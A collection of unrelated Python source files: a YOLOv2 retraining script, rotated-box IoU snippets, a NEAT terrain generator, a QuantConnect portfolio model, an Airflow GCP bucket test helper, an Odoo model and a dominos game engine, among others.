# area1 = boxes1[2] * boxes1[3]
# area2 = boxes2[2] * boxes2[3]
# r1 = ((boxes1[0], boxes1[1]), (boxes1[2], boxes1[3]), boxes1[4])
# r2 = ((boxes2[0], boxes2[1]), (boxes2[2], boxes2[3]), boxes2[4])
#
# int_pts = cv2.rotatedRectangleIntersection(r1, r2)[1]
# if int_pts is not None:
# order_pts = cv2.convexHull(int_pts, returnPoints=True)
#
# int_area = cv2.contourArea(order_pts)
#
# inter = int_area * 1.0 / (area1 + area2 - int_area)
# return inter
# else:
# return 0.0
#
# for i in range(100):
# a = np.array([np.random.randn()])
# a = np.array([1, 0.5, 2, 1, 0])
# a = np.array([1, 0.5, 1, 2, 90])
# b = np.array([0.5, 1, 2, 1, -90])
#
# iou = iou_rotate_calculate(a, b)
# print(iou)
# cnt = np.array([[0, 0], [2, 0], [2, 2], [0, 2]])
# cnt = np.array([[0, 2], [2, 0], [3, 1], [1, 3]])
# cnt = np.array([[0, 1], [1, 0], [3, 2], [2, 3]])
#
# rect = cv2.minAreaRect(cnt)
# box = cv2.boxPoints(rect)
# box = np.int0(box)
# print(rect)
# print(box)
# rect = ((1.5, 1.5), (2.8284271, 1.4142135), -45)
# box = cv2.boxPoints(rect)
# print(box)
# a = np.array([[10, 10, 20, 10, 0]], dtype=np.float32)
# b = np.array([[10, 10, 40, 10, 0]], dtype=np.float32)
# c = rbbx_overlaps(a, b)
# d = rbox_overlaps(a, b)
# print(c)
# print(d)
|
"""
This is a script that can be used to retrain the YOLOv2 model for your own dataset.
"""
import argparse
import os
import sys
import matplotlib.pyplot as plt
import numpy as np
import PIL
import tensorflow as tf
from keras import backend as K
from keras.layers import Input, Lambda, Conv2D
from keras.models import load_model, Model
from keras.callbacks import TensorBoard, ModelCheckpoint, EarlyStopping
from yad2k.models.keras_yolo import (preprocess_true_boxes, yolo_body,
yolo_eval, yolo_head, yolo_loss)
from yad2k.utils.draw_boxes import draw_boxes
# Args
argparser = argparse.ArgumentParser(
description="Retrain or 'fine-tune' a pretrained YOLOv2 model for your own data.")
argparser.add_argument(
'-d',
'--data_path',
help="path to numpy data file (.npz) containing np.object array 'boxes' and np.uint8 array 'images'",
default=os.path.join('data', 'data_training_set.npz'))
argparser.add_argument(
'-a',
'--anchors_path',
help='path to anchors file, defaults to yolo_anchors.txt',
default=os.path.join('model_data', 'yolo_anchors.txt'))
argparser.add_argument(
'-c',
'--classes_path',
help='path to classes file, defaults to pascal_classes.txt',
default=os.path.join('model_data', 'league_classes.txt'))
YOLO_ANCHORS = np.array(
((0.57273, 0.677385), (1.87446, 2.06253), (3.33843, 5.47434),
(7.88282, 3.52778), (9.77052, 9.16828)))
debug = False
BATCH_SIZE_1 = 32
BATCH_SIZE_2 = 8
EPOCHS_1 = 5
EPOCHS_2 = 30
EPOCHS_3 = 30
if debug:
BATCH_SIZE_1 = 2
BATCH_SIZE_2 = 2
EPOCHS_1 = 1
EPOCHS_2 = 1
EPOCHS_3 = 1
class TrainingData:
# the dataset is broken up in to "clusters"
# these are npz files with 20 games worth of data.
# its not ecnomical to load the entire dataset into one npz files
# our pc would most likely run of ram to allocate for the massive file.
#
# all_npz_files_clusters is a list paths to all the npz clusters.
# i load these in on a need basis.
def __init__(self, all_train_npz_clusters, all_val_npz_clusters):
# set up our clusters
self.all_train_npz_clusters = all_train_npz_clusters
self.all_val_npz_clusters = all_val_npz_clusters
# keep track of which training cluster we have loaded
self.curr_train_npz_cluster = np.load(all_train_npz_clusters[0])
self.train_cluster_index = 0
# keep track of which validation cluster we have loaded
self.curr_val_npz_cluster = np.load(all_val_npz_clusters[0])
self.val_cluster_index = 0
# 90% of images are training, 10% are validation.
# images and boxes will simply point to the images of the cluster we are currently on
self.train_images = self.curr_train_npz_cluster['images']
self.train_boxes = self.curr_train_npz_cluster['boxes']
# set up validationas images/boxes well.
self.val_images = self.curr_val_npz_cluster['images']
self.val_boxes = self.curr_val_npz_cluster['boxes']
# pointers to handle the images within our batch
self.train_batch_pointer = 0
self.val_batch_pointer = 0
def load_train_cluster(self):
# to fix #TODO from below
# left_over_images = []
# for i in range(self.train_batch_pointer, len(self.train_images)):
# left_over_images.append(self.train_images[i])
# print("Leftover...")
# first figure out which cluster we're moving to
# mod length of all_train_npz_clusters keeps us in range
self.train_cluster_index = (self.train_cluster_index + 1) % len(self.all_train_npz_clusters)
# then load it
print("Loading new cluster... ", self.all_train_npz_clusters[self.train_cluster_index])
self.curr_train_npz_cluster = np.load(self.all_train_npz_clusters[self.train_cluster_index])
# then append proper images/boxes
self.train_images = self.curr_train_npz_cluster['images']
self.train_boxes = self.curr_train_npz_cluster['boxes']
# finally, reset training pointer
self.train_batch_pointer = 0
# do same thing for val as done above for val clusters
def load_val_cluster(self):
self.val_cluster_index = (self.val_cluster_index + 1) % len(self.all_val_npz_clusters)
self.curr_val_npz_cluster = np.load(self.all_val_npz_clusters[self.val_cluster_index])
self.val_images = self.curr_val_npz_cluster['images']
self.val_boxes = self.curr_val_npz_cluster['boxes']
self.val_batch_pointer = 0
def load_train_batch(self, batch_size):
while True:
# print("TBP.. ", self.train_batch_pointer)
# this means we have reached the end of our cluster and need to load another.
# TODO: this is sort of bad because we waste the frames left over.
# ex batch size 32, cluster as 63 images, after loading first 32 images
# 32 + 32 > 63, so we skip over all this precious data!
if self.train_batch_pointer + batch_size > len(self.train_images):
self.load_train_cluster()
initial_index = self.train_batch_pointer
end_index = self.train_batch_pointer + batch_size
images_to_process = self.train_images[initial_index:end_index]
boxes_to_process = self.train_boxes[initial_index:end_index]
# print("Boxes to process... ")
# print(boxes_to_process)
# processed
p_images, p_boxes = process_data(images_to_process, boxes_to_process)
detectors_mask, matching_true_boxes = get_detector_mask(p_boxes, YOLO_ANCHORS)
self.train_batch_pointer += batch_size
yield [p_images, p_boxes, detectors_mask, matching_true_boxes], np.zeros(len(p_images))
def load_val_batch(self, batch_size):
while True:
# fix pointers if they extend to far!
if self.val_batch_pointer + batch_size > len(self.val_images):
self.load_val_cluster()
initial_index = self.val_batch_pointer
end_index = self.val_batch_pointer + batch_size
images_to_process = self.val_images[initial_index:end_index]
boxes_to_process = self.val_boxes[initial_index:end_index]
# processed
p_images, p_boxes = process_data(images_to_process, boxes_to_process)
detectors_mask, matching_true_boxes = get_detector_mask(p_boxes, YOLO_ANCHORS)
self.val_batch_pointer += batch_size
yield [p_images, p_boxes, detectors_mask, matching_true_boxes], np.zeros(len(p_images))
# total number of batches to run for one epoch
def get_train_steps(self, batch_size):
print("Getting train steps...")
steps = 0
for cluster in self.all_train_npz_clusters:
loaded_clust = np.load(cluster)
steps += len(loaded_clust['images'])
print(steps / batch_size)
return int(steps / batch_size)
# total number of batches to run for validation
def get_val_steps(self, batch_size):
print("Getting val steps...")
steps = 0
for cluster in self.all_val_npz_clusters:
loaded_clust = np.load(cluster)
steps += len(loaded_clust['images'])
# return int(len(self.val_images) / batch_size)
print(steps / batch_size)
return int(steps / batch_size)
def _main(args):
data_path = os.path.expanduser(args.data_path)
classes_path = os.path.expanduser(args.classes_path)
anchors_path = os.path.expanduser(args.anchors_path)
class_names = get_classes(classes_path)
anchors = get_anchors(anchors_path)
# custom data saved as a numpy file.
# data = (np.load(data_path))
# easy class to handle all the data
train_clusts = os.listdir('/media/student/DATA/clusters_cleaned/train/')
val_clusts = os.listdir('/media/student/DATA/clusters_cleaned/val/')
train_clus_clean = []
val_clus_clean = []
for folder_name in train_clusts:
train_clus_clean.append('/media/student/DATA/clusters_cleaned/train/' + folder_name)
for folder_name in val_clusts:
val_clus_clean.append('/media/student/DATA/clusters_cleaned/val/' + folder_name)
data = TrainingData(train_clus_clean, val_clus_clean)
anchors = YOLO_ANCHORS
model_body, model = create_model(anchors, class_names)
train(
model,
class_names,
anchors,
data
)
# here i just pass in the val set of images
images = None
boxes = None
images, boxes = process_data(data.val_images[0:500], data.val_boxes[0:500])
if debug:
images, boxes = process_data(data.val_images[0:10], data.val_boxes[0:10])
draw(model_body,
class_names,
anchors,
images,
image_set='val', # assumes training/validation split is 0.9
weights_name='trained_stage_3_best.h5',
save_all=False)
def get_classes(classes_path):
'''loads the classes'''
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def get_anchors(anchors_path):
'''loads the anchors from a file'''
if os.path.isfile(anchors_path):
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
else:
Warning("Could not open anchors file, using default.")
return YOLO_ANCHORS
def process_data(images, boxes=None):
'''processes the data'''
images = [PIL.Image.fromarray(i) for i in images]
orig_size = np.array([images[0].width, images[0].height])
orig_size = np.expand_dims(orig_size, axis=0)
# Image preprocessing.
processed_images = [i.resize((416, 416), PIL.Image.BICUBIC) for i in images]
processed_images = [np.array(image, dtype=np.float) for image in processed_images]
processed_images = [image/255. for image in processed_images]
if boxes is not None:
# Box preprocessing.
# Original boxes stored as 1D list of class, x_min, y_min, x_max, y_max.
boxes = [box.reshape((-1, 5)) for box in boxes]
# Get extents as y_min, x_min, y_max, x_max, class for comparision with
# model output.
boxes_extents = [box[:, [2, 1, 4, 3, 0]] for box in boxes]
# Get box parameters as x_center, y_center, box_width, box_height, class.
boxes_xy = [0.5 * (box[:, 3:5] + box[:, 1:3]) for box in boxes]
boxes_wh = [box[:, 3:5] - box[:, 1:3] for box in boxes]
boxes_xy = [boxxy / orig_size for boxxy in boxes_xy]
boxes_wh = [boxwh / orig_size for boxwh in boxes_wh]
boxes = [np.concatenate((boxes_xy[i], boxes_wh[i], box[:, 0:1]), axis=1) for i, box in enumerate(boxes)]
# find the max number of boxes
max_boxes = 0
for boxz in boxes:
if boxz.shape[0] > max_boxes:
max_boxes = boxz.shape[0]
# add zero pad for training
for i, boxz in enumerate(boxes):
if boxz.shape[0] < max_boxes:
zero_padding = np.zeros( (max_boxes-boxz.shape[0], 5), dtype=np.float32)
boxes[i] = np.vstack((boxz, zero_padding))
return np.array(processed_images), np.array(boxes)
else:
return np.array(processed_images)
def get_detector_mask(boxes, anchors):
'''
Precompute detectors_mask and matching_true_boxes for training.
Detectors mask is 1 for each spatial position in the final conv layer and
anchor that should be active for the given boxes and 0 otherwise.
Matching true boxes gives the regression targets for the ground truth box
that caused a detector to be active or 0 otherwise.
'''
detectors_mask = [0 for i in range(len(boxes))]
matching_true_boxes = [0 for i in range(len(boxes))]
for i, box in enumerate(boxes):
detectors_mask[i], matching_true_boxes[i] = preprocess_true_boxes(box, anchors, [416, 416])
return np.array(detectors_mask), np.array(matching_true_boxes)
def create_model(anchors, class_names, load_pretrained=True, freeze_body=True):
'''
returns the body of the model and the model
# Params:
load_pretrained: whether or not to load the pretrained model or initialize all weights
freeze_body: whether or not to freeze all weights except for the last layer's
# Returns:
model_body: YOLOv2 with new output layer
model: YOLOv2 with custom loss Lambda layer
'''
detectors_mask_shape = (13, 13, 5, 1)
matching_boxes_shape = (13, 13, 5, 5)
# Create model input layers.
image_input = Input(shape=(416, 416, 3))
boxes_input = Input(shape=(None, 5))
detectors_mask_input = Input(shape=detectors_mask_shape)
matching_boxes_input = Input(shape=matching_boxes_shape)
# Create model body.
yolo_model = yolo_body(image_input, len(anchors), len(class_names))
topless_yolo = Model(yolo_model.input, yolo_model.layers[-2].output)
if load_pretrained:
# Save topless yolo:
topless_yolo_path = os.path.join('model_data', 'yolo_topless.h5')
if not os.path.exists(topless_yolo_path):
print("CREATING TOPLESS WEIGHTS FILE")
yolo_path = os.path.join('model_data', 'yolo.h5')
model_body = load_model(yolo_path)
model_body = Model(model_body.inputs, model_body.layers[-2].output)
model_body.save_weights(topless_yolo_path)
topless_yolo.load_weights(topless_yolo_path)
if freeze_body:
for layer in topless_yolo.layers:
layer.trainable = False
final_layer = Conv2D(len(anchors)*(5+len(class_names)), (1, 1), activation='linear')(topless_yolo.output)
model_body = Model(image_input, final_layer)
# Place model loss on CPU to reduce GPU memory usage.
with tf.device('/cpu:0'):
# TODO: Replace Lambda with custom Keras layer for loss.
model_loss = Lambda(
yolo_loss,
output_shape=(1, ),
name='yolo_loss',
arguments={'anchors': anchors,
'num_classes': len(class_names)})([
model_body.output, boxes_input,
detectors_mask_input, matching_boxes_input
])
model = Model(
[model_body.input, boxes_input, detectors_mask_input,
matching_boxes_input], model_loss)
return model_body, model
def train(model, class_names, anchors, data):
'''
retrain/fine-tune the model
logs training with tensorboard
saves training weights in current directory
best weights according to val_loss is saved as trained_stage_3_best.h5
'''
model.compile(
optimizer='adam', loss={
'yolo_loss': lambda y_true, y_pred: y_pred
}) # This is a hack to use the custom loss function in the last layer.
logging = TensorBoard()
checkpoint = ModelCheckpoint("trained_stage_3_best.h5", monitor='val_loss',
save_weights_only=True, save_best_only=True)
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=15, verbose=1, mode='auto')
print("Training on %d images " % (data.get_train_steps(BATCH_SIZE_1) * BATCH_SIZE_1))
model.fit_generator(data.load_train_batch(BATCH_SIZE_1),
steps_per_epoch=data.get_train_steps(BATCH_SIZE_1),
epochs=EPOCHS_1,
validation_data=data.load_val_batch(BATCH_SIZE_1),
validation_steps=data.get_val_steps(BATCH_SIZE_1),
callbacks=[logging])
model.save_weights('trained_stage_1.h5')
print("Saved!")
model_body, model = create_model(anchors, class_names, load_pretrained=False, freeze_body=False)
model.load_weights('trained_stage_1.h5')
model.compile(
optimizer='adam', loss={
'yolo_loss': lambda y_true, y_pred: y_pred
}) # This is a hack to use the custom loss function in the last layer.
print("Running second....")
model.fit_generator(data.load_train_batch(BATCH_SIZE_2),
steps_per_epoch=data.get_train_steps(BATCH_SIZE_2),
epochs=EPOCHS_2,
validation_data=data.load_val_batch(BATCH_SIZE_2),
validation_steps=data.get_val_steps(BATCH_SIZE_2),
callbacks=[logging])
model.save_weights('trained_stage_2.h5')
# yad2k calls for smaller batches here
model.fit_generator(data.load_train_batch(BATCH_SIZE_2),
steps_per_epoch=data.get_train_steps(BATCH_SIZE_2),
epochs=EPOCHS_3,
validation_data=data.load_val_batch(BATCH_SIZE_2),
validation_steps=data.get_val_steps(BATCH_SIZE_2),
callbacks=[logging, checkpoint, early_stopping])
model.save_weights('trained_stage_3.h5')
def draw(model_body, class_names, anchors, image_data, image_set='val',
weights_name='trained_stage_3_best.h5', out_path="output_images", save_all=True):
'''
Draw bounding boxes on image data
'''
if image_set == 'train':
image_data = np.array([np.expand_dims(image, axis=0)
for image in image_data[:int(len(image_data)*.9)]])
elif image_set == 'val':
image_data = np.array([np.expand_dims(image, axis=0)
for image in image_data[int(len(image_data)*.9):]])
elif image_set == 'all':
image_data = np.array([np.expand_dims(image, axis=0)
for image in image_data])
else:
ValueError("draw argument image_set must be 'train', 'val', or 'all'")
# model.load_weights(weights_name)
print(image_data.shape)
model_body.load_weights(weights_name)
# Create output variables for prediction.
yolo_outputs = yolo_head(model_body.output, anchors, len(class_names))
input_image_shape = K.placeholder(shape=(2, ))
boxes, scores, classes = yolo_eval(
yolo_outputs, input_image_shape, score_threshold=0.07, iou_threshold=0)
# Run prediction on overfit image.
sess = K.get_session() # TODO: Remove dependence on Tensorflow session.
if not os.path.exists(out_path):
os.makedirs(out_path)
for i in range(len(image_data)):
out_boxes, out_scores, out_classes = sess.run(
[boxes, scores, classes],
feed_dict={
model_body.input: image_data[i],
input_image_shape: [image_data.shape[2], image_data.shape[3]],
K.learning_phase(): 0
})
print('Found {} boxes for image.'.format(len(out_boxes)))
print(out_boxes)
# Plot image with predicted boxes.
image_with_boxes = draw_boxes(image_data[i][0], out_boxes, out_classes,
class_names, out_scores)
# Save the image:
if save_all or (len(out_boxes) > 0):
image = PIL.Image.fromarray(image_with_boxes)
image.save(os.path.join(out_path,str(i)+'.png'))
# To display (pauses the program):
# plt.imshow(image_with_boxes, interpolation='nearest')
# plt.show()
if __name__ == '__main__':
args = argparser.parse_args()
_main(args)
|
from permissions import Permissions
from address_descriptor import AddressDescriptor
from bitstring import BitArray
from enum import Enum
TLBRecType = Enum(
"TLBRecType",
"TLBRecType_SmallPage TLBRecType_LargePage TLBRecType_Section TLBRecType_Supersection TLBRecType_MMUDisabled"
)
class TLBRecord(object):
def __init__(self):
self.perms = Permissions()
self.ng = False
self.domain = BitArray(length=4)
self.contiguousbit = False
self.level = 0
self.blocksize = 0
self.addrdesc = AddressDescriptor()
|
# Copyright (c) 2020 Uber Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
from collections import deque
import json
import neat
from neat.six_util import iteritems, iterkeys
import numpy as np
import pickle
import random
import time
import os
import logging
logger = logging.getLogger(__name__)
class PrettyGenome(neat.DefaultGenome):
def __init__(self, key):
super().__init__(key)
def __str__(self):
connections = [c for c in self.connections.values() if c.enabled]
connections.sort()
s = "Key: {0}\nFitness: {1}\nNodes:".format(self.key, self.fitness)
for k, ng in iteritems(self.nodes):
s += "\n\t{0} {1!s}".format(k, ng)
s += "\nConnections:"
for c in connections:
s += "\n\t" + str(c)
return s
class CppnEnvParams:
x = np.array([(i - 200 / 2.0) / (200 / 2.0) for i in range(200)])
def __init__(self, cppn_config_path='config-cppn', genome_path=None):
self.cppn_config_path = os.path.dirname(__file__) + '/' + cppn_config_path
self.genome_path = genome_path
self.hardcore = False
self.cppn_config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction, neat.DefaultSpeciesSet, neat.DefaultStagnation, self.cppn_config_path)
self.cppn_genome = None
self.altitude_fn = lambda x: x
if genome_path is not None:
self.cppn_genome = pickle.load(open(genome_path, 'rb'))
else:
start_cppn_genome = PrettyGenome('0')
start_cppn_genome.configure_new(self.cppn_config.genome_config)
start_cppn_genome.nodes[0].activation = 'identity'
self.cppn_genome = start_cppn_genome
self.reset_altitude_fn()
def reset_altitude_fn(self):
net = neat.nn.FeedForwardNetwork.create(self.cppn_genome, self.cppn_config)
self.altitude_fn = net.activate
def get_mutated_params(self):
is_valid = False
while not is_valid:
mutated = copy_genome(self.cppn_genome)
mutated.nodes[0].response = 1.0
mutated.key = datetime.datetime.utcnow().isoformat()
mutated.mutate(self.cppn_config.genome_config)
is_valid = is_genome_valid(mutated) & (self.cppn_genome.distance(mutated, self.cppn_config.genome_config) > 0)
if not is_valid:
continue
net = neat.nn.FeedForwardNetwork.create(mutated, self.cppn_config)
y = np.array([net.activate((xi, )) for xi in self.x])
y -= y[0] # normalize to start at altitude 0
threshold_ = np.abs(np.max(y))
is_valid = (threshold_ > 0)
if not is_valid:
continue
if threshold_ < 0.25:
mutated.nodes[0].response = (np.random.random() / 2 + 0.25) / threshold_
if threshold_ > 16:
mutated.nodes[0].response = (np.random.random() * 4 + 12) / threshold_
res = CppnEnvParams()
res.cppn_genome = mutated
res.reset_altitude_fn()
return res
def save_xy(self, folder='/tmp'):
with open(folder + '/' + self.cppn_genome.key + '_xy.json', 'w') as f:
net = neat.nn.FeedForwardNetwork.create(self.cppn_genome, self.cppn_config)
y = np.array([net.activate((xi, )) for xi in self.x])
f.write(json.dumps({'x': self.x.tolist(), 'y': y.tolist()}))
def to_json(self):
return json.dumps({
'cppn_config_path': self.cppn_config_path,
'genome_path': self.genome_path,
})
def save_genome(self):
file_path = '/tmp/genome_{}_saved.pickle'.format(time.time())
pickled = pickle.dump(self.cppn_genome, open(file_path, 'wb'))
def copy_genome(genome):
file_path = '/tmp/genome_{}.pickle'.format(time.time())
pickled = pickle.dump(genome, open(file_path, 'wb'))
return pickle.load(open(file_path, 'rb'))
def is_genome_valid(g):
graph = {}
for key in g.connections.keys():
if key[0] not in graph:
graph[key[0]] = []
graph[key[0]].append(key[1])
q = deque([-1])
while len(q) > 0:
cur = q.popleft()
if cur == 0:
return True
if cur not in graph:
continue
for node in graph[cur]:
q.append(node)
return False
|
from datetime import datetime, timedelta
import pytz
from collections import defaultdict
from itertools import groupby
class MarketCapWeightedPortfolioConstructionModel(PortfolioConstructionModel):
def __init__(self):
self.marketCapDict = {}
self.removedSymbols = []
self.insightCollection = InsightCollection()
self.nextExpiryTime = datetime.min.replace(tzinfo=pytz.utc)
self.rebalanceFreq = timedelta(30)
self.securities = {}
self.maxWeight = .1
self.minWeight = .01
def CreateTargets(self, algorithm, insights):
targets = []
if not self.ShouldCreateTargets(algorithm.UtcTime, insights):
return targets
self.insightCollection.AddRange(insights)
targets.extend(self.CreateZeroQuantityTargetsForRemovedSecurities())
targets.extend(self.CreateZeroQuantityTargetsForExpiredInsights(algorithm))
lastActiveInsights = self.GetLastActiveInsights(algorithm)
if self.ShouldUpdateTargetPercent(algorithm, lastActiveInsights):
weights = self.DetermineTargetPercent(algorithm, lastActiveInsights)
targets.extend([PortfolioTarget.Percent(algorithm, symbol, weight) for symbol, weight in weights.items()])
self.UpdateNextExpiryTime(algorithm)
return targets
def ShouldCreateTargets(self, time, insights):
return len(insights) > 0 or (time > self.nextExpiryTime)
def CreateZeroQuantityTargetsForRemovedSecurities(self):
if len(self.removedSymbols) == 0:
return []
zeroTargets = [PortfolioTarget(symbol, 0) for symbol in self.removedSymbols]
self.insightCollection.Clear(self.removedSymbols)
self.removedSymbols = []
return zeroTargets
def CreateZeroQuantityTargetsForExpiredInsights(self, algorithm):
zeroTargets = []
expiredInsights = self.insightCollection.RemoveExpiredInsights(algorithm.UtcTime)
if len(expiredInsights) == 0:
return zeroTargets
key = lambda insight: insight.Symbol
for symbol, _ in groupby(sorted(expiredInsights, key=key), key):
if not self.insightCollection.HasActiveInsights(symbol, algorithm.UtcTime):
zeroTargets.append(PortfolioTarget(symbol, 0))
continue
return zeroTargets
def GetLastActiveInsights(self, algorithm):
activeInsights = self.insightCollection.GetActiveInsights(algorithm.UtcTime)
lastActiveInsights = []
groupedInsights = GroupBy(activeInsights, key = lambda insight: (insight.Symbol, insight.SourceModel))
for kvp in groupedInsights:
lastActiveInsights.append(sorted(kvp[1], key=lambda insight: insight.GeneratedTimeUtc)[-1])
return lastActiveInsights
def ShouldUpdateTargetPercent(self, algorithm, lastActiveInsights):
if algorithm.UtcTime > self.nextExpiryTime:
return True
for insight in lastActiveInsights:
if insight.Direction != InsightDirection.Flat and not algorithm.Portfolio[insight.Symbol].Invested:
return True
elif insight.Direction != InsightDirection.Up and algorithm.Portfolio[insight.Symbol].IsLong:
return True
elif insight.Direction != InsightDirection.Down and algorithm.Portfolio[insight.Symbol].IsShort:
return True
else:
continue
return False
def UpdateNextExpiryTime(self, algorithm):
self.nextExpiryTime = self.insightCollection.GetNextExpiryTime()
if self.nextExpiryTime is None:
self.nextExpiryTime = algorithm.UtcTime + self.rebalanceFreq
def DetermineTargetPercent(self, algorithm, lastActiveInsights):
weights = {}
if not lastActiveInsights:
return weights
marketCapBySymbol = {insight.Symbol : algorithm.Securities[insight.Symbol].Fundamentals.MarketCap if insight.Direction == InsightDirection.Up else 0 for insight in lastActiveInsights if insight.Symbol in self.securities}
aggregatedMarketCap = sum(marketCapBySymbol.values())
weights = {symbol : min(self.maxWeight, round(mktCap/aggregatedMarketCap, 5)) for symbol, mktCap in marketCapBySymbol.items()}
weights.update({symbol : max(self.minWeight, weight) for symbol, weight in weights.items() if weight > 0})
return weights
def OnSecuritiesChanged(self, algorithm, changes):
for security in changes.RemovedSecurities:
symbol = security.Symbol
self.removedSymbols.append(symbol)
self.securities.pop(symbol, None)
for security in changes.AddedSecurities:
if security.Fundamentals is not None and security.Fundamentals.MarketCap > 0:
self.securities[security.Symbol] = security
def GroupBy(iterable, key=lambda x: x):
d = defaultdict(list)
for item in iterable:
d[key(item)].append(item)
return d.items()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import argparse
import os
from tests.contrib.utils.logging_command_executor import LoggingCommandExecutor
from tests.providers.google.cloud.utils.gcp_authenticator import GCP_GCS_KEY, GcpAuthenticator
SERVICE_EMAIL_FORMAT = "project-%s@storage-transfer-service.iam.gserviceaccount.com"
GCP_PROJECT_ID = os.environ.get("GCP_PROJECT_ID", "example-project")
TARGET_BUCKET_NAME = os.environ.get("GCP_SPEECH_TEST_BUCKET", "gcp-speech-test-bucket")
class GCPTextToSpeechTestHelper(LoggingCommandExecutor):
def create_target_bucket(self):
self.execute_cmd(["gsutil", "mb", "-p", GCP_PROJECT_ID, "gs://%s/" % TARGET_BUCKET_NAME])
def delete_target_bucket(self):
self.execute_cmd(["gsutil", "rm", "-r", "gs://%s/" % TARGET_BUCKET_NAME], True)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Create and delete bucket for system tests.")
parser.add_argument(
"--action",
dest="action",
required=True,
choices=("create-target-bucket", "delete-target-bucket", "before-tests", "after-tests"),
)
action = parser.parse_args().action
helper = GCPTextToSpeechTestHelper()
gcp_authenticator = GcpAuthenticator(GCP_GCS_KEY)
helper.log.info("Starting action: {}".format(action))
gcp_authenticator.gcp_store_authentication()
try:
gcp_authenticator.gcp_authenticate()
if action == "before-tests":
helper.create_target_bucket()
elif action == "after-tests":
helper.delete_target_bucket()
elif action == "create-target-bucket":
helper.create_target_bucket()
elif action == "delete-target-bucket":
helper.delete_target_bucket()
else:
raise Exception("Unknown action: {}".format(action))
finally:
gcp_authenticator.gcp_restore_authentication()
helper.log.info("Finishing action: {}".format(action))
|
from socketIO_client import SocketIO, BaseNamespace
class Handlers(BaseNamespace):
def on_message_from_server(self, msg):
print("Incoming msg: %s" % msg)
io = SocketIO('localhost', 9090, Handlers, resource="api/v1/socket")
io.emit('hello_from_client')
io.wait(seconds=10)
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import csv
import unittest
from fedora import utils
class TestUtils(unittest.TestCase):
def test_parse_to_date(self):
w3 = utils.as_w3c_datetime("2016-12-12")
self.assertEqual("2016-12-11T23:00Z", w3)
w3 = utils.as_w3c_datetime("Wed, 21 Dec 2016 12:31:38 GMT")
self.assertEqual("2016-12-21T12:31:38Z", w3)
# ValueError
err = utils.as_w3c_datetime("123456789")
self.assertEqual("Error: 123456789", err)
@unittest.skip("not a test")
def test_csv_dialects(self):
print(csv.list_dialects())
# ['excel-tab', 'excel', 'unix']
# if you want the standard RFC4180 then roll your own.
|
from .parser import Parser
from .parse_result import ParseResult
from .nodes import *
|
'''
Created on 29 nov. 2019
@author: usuario
'''
from odoo import api, fields, models
class mecanico(models.Model):
_name = "upocar.mecanico"
_rec_name = "nombre_apellidos"
nombre = fields.Char("Nombre", size=32, required=True)
apellidos = fields.Char("Apellidos", size=64, required=True)
especialidad = fields.Char("Especialidad", size=64, required=True)
num_reparaciones = fields.Integer(string="Número de reparaciones", compute="_compute_num_reparaciones", store=True)
reparacion_ids = fields.Many2many("upocar.reparacion", string="Reparaciones")
taller_id = fields.Many2one("upocar.taller", string="Taller", required=True)
nombre_apellidos = fields.Char(compute="_compute_nombre_apellidos")
@api.depends("nombre", "apellidos")
def _compute_nombre_apellidos(self):
for record in self:
record.nombre_apellidos = record.nombre + " " + record.apellidos
@api.depends("reparacion_ids")
def _compute_num_reparaciones(self):
for record in self:
if(record.reparacion_ids):
record.num_reparaciones = len(record.reparacion_ids)
|
"""A game engine for running a game of Dominos."""
import sys, random, json, time
sys.path.insert(0, '..') # For importing app config, required for using db
from dominos.Config import Config
from dominos.classes.Board import Board
from dominos.classes.Pack import Pack
from dominos.classes.Player import Player
class Engine:
def __init__(self, whisper_f=None, shout_f=None, query_f=None, **kwargs):
self.config = Config(**kwargs)
self.n_players = self.config.n_players
self.hand_size = self.config.hand_size
self.win_threshold = self.config.win_threshold
self.check_5_doubles = self.config.check_5_doubles
self.players = []
self.board = None
self.pack = None
for i in range(self.n_players):
self.players.append(Player(i))
self.current_player = None
self.n_passes = 0
if None in [shout_f, whisper_f, query_f]:
raise ValueError("Must specify both shout, whisper, and retrieve functions or omit all")
self.local = shout_f is None
self.shout_f = shout_f
self.whisper_f = whisper_f
self.query_f = query_f
def run_game(self):
"""Start and run a game until completion, handling game logic as necessary."""
self.show_scores()
next_round_fresh = self.play_round(fresh_round=True)
while not self.game_is_over():
next_round_fresh = self.play_round(next_round_fresh)
scores = self.get_scores(indexed=False)
winner = scores.index(max(scores))
self.shout("Game is over!\n\nPlayer {} wins!".format(winner))
self.shout("", "game_over")
return winner
def play_round(self, fresh_round=False):
self.board = Board()
self.draw_hands(fresh_round)
self.shout("", "clear_board")
if fresh_round:
self.current_player = self.determine_first_player()
blocked = False
play_fresh = fresh_round
while self.players_have_dominos() and not blocked and not self.game_is_over():
blocked = self.play_turn(play_fresh)
self.next_turn()
self.show_scores()
play_fresh = False
if not self.players_have_dominos():
# Reverse current player switch
self.current_player = (self.current_player + self.n_players - 1) % self.n_players
self.players[self.current_player].add_points(self.get_value_on_domino(self.current_player))
print(f"Player {self.current_player} dominoed!")
self.show_scores()
return False
elif blocked:
print("Game blocked!")
blocked_scorer, points = self.get_blocked_result()
if blocked_scorer is not None:
print(f"Player {blocked_scorer} scores {points}")
self.players[blocked_scorer].add_points(points)
self.show_scores()
return True
